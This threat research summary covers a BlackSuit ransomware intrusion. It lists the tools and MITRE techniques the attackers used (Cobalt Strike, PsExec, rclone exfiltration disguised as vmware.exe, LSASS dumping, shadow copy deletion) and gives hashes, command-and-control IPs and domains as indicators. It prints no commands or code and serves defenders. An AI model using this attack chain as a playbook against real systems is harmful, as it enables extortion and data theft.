Threat Research

A Hybrid Approach of BlackSuit Ransomware

Securonix
A Hybrid Approach of BlackSuit Ransomware

The Cybereason Security Services report analyzes a sophisticated BlackSuit ransomware attack that utilized tools like Cobalt Strike, rclone, and Windows native processes for lateral movement, data exfiltration, and file encryption. The attack uniquely combined data deletion and partial encryption to speed execution and evade detection, posing a significant threat to targeted organizations. #BlackSuit #CobaltStrike #rclone

Keypoints

  • BlackSuit ransomware emerged in mid-2023 as a rebrand or spin-off from Royal ransomware, itself an evolution of Conti.
  • The group employs Cobalt Strike, rclone, PsExec, RDP, and vssadmin for multi-stage attacks including lateral movement, data exfiltration, and encryption.
  • Unlike traditional ransomware, BlackSuit exfiltrates and deletes parts of data before encrypting files to accelerate attack speed.
  • Use of the “-nomutex” flag enables multiple concurrent ransomware instances, a deviation from typical mutex-based execution control.
  • Attackers leveraged renamed legitimate tools like rclone (as vmware.exe) to covertly exfiltrate approximately 60 GB of data.
  • Credential dumping and LSASS memory access were conducted via Cobalt Strike beacon injections and execution of Mimikatz or similar tools.
  • BlackSuit avoids encrypting critical system directories and uses targeted exclusions to prevent system instability during encryption.

MITRE Techniques

  • [T1059] Command and scripting interpreter – PowerShell was used to download Cobalt Strike beacons and additional malicious payloads (“PowerShell downloading Cobalt Strike beacon, and other malicious payload”).
  • [T1021.002] Remote Services: SMB/Windows Admin Shares – PsExec.exe employed for lateral movement within the environment (“Lateral movement from psexec.exe”).
  • [T1569.002] System Services: Service Execution – Remote service creation and lateral movement through PsExec.exe (“Lateral movement from psexec.exe”).
  • [T1021] Remote Services – Utilization of RPC for lateral movement (“Lateral movement from RPC”).
  • [T1021] Remote Desktop Protocol (RDP) – RDP access enabled by adding an existing user to Remote Desktop Users group (“Adds an existing user (Administrator) to the Remote Desktop Users group, enabling RDP access”).
  • [T1082] System Information Discovery – Collection of installed software and security products information (“Gathering details about installed software, specifically security products”).
  • [T1562.001] Disable or Modify Tools – Disabling security products to impair defenses (“Uninstall a product (probably security software)”).
  • [T1105] Ingress Tool Transfer – PowerShell used to download multiple malicious payloads including Cobalt Strike beacons (“PowerShell downloading Cobalt Strike beacon, (vmware.dll)(vm.dll)(vm80.dll)(xxx.exe)(yyy.exe) and other payloads”).
  • [T1003.001] LSASS Memory – LSASS credential access and dumping facilitated by Cobalt Strike beacons (“Cobalt Strike beacon lead to LSASS credential access and dumping”).
  • [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – Data exfiltration via rclone utility (“Data exfiltration through rclone.exe”).
  • [T1614] System Location Discovery – Avoidance of encrypting system directories and shares to evade detection and maintain system functionality (“Avoids encrypting system directories and network shares like ‘Windows’, ‘IPC$’, and ‘ADMIN$’”).
  • [T1490] Inhibit System Recovery – Use of vssadmin.exe to delete shadow copies and inhibit recovery (“Deletes Volume Shadow Copies (vssadmin.exe) to prevent recovery”).
  • [T1486] Data Encrypted for Impact – Encryption of files by the BlackSuit ransomware payload (“Data encryption by BlackSuit ransomware payload”).

Indicators of Compromise

  • [SHA-256] Hashes of Cobalt Strike Beacon files – vm80.dll (d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b), vm.dll (69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03)
  • [SHA-256] BlackSuit payload disguised as rclone.exe – 0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298
  • [IP Address] Command and Control IPs – 184.174.96.71, 180.131.145.85, 82.192.88.95, 88.119.175.194
  • [Domain] Malicious C2 domains – misstallion.com, store.misstallion.com, mail.misstallion.com, store.beamofthemoon.com, mail.beamofthemoon.com, beamofthemoon.com, mail.kiddlanka.com, kiddlanka.com

Read more: https://www.cybereason.com/blog/blacksuit-data-exfil

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint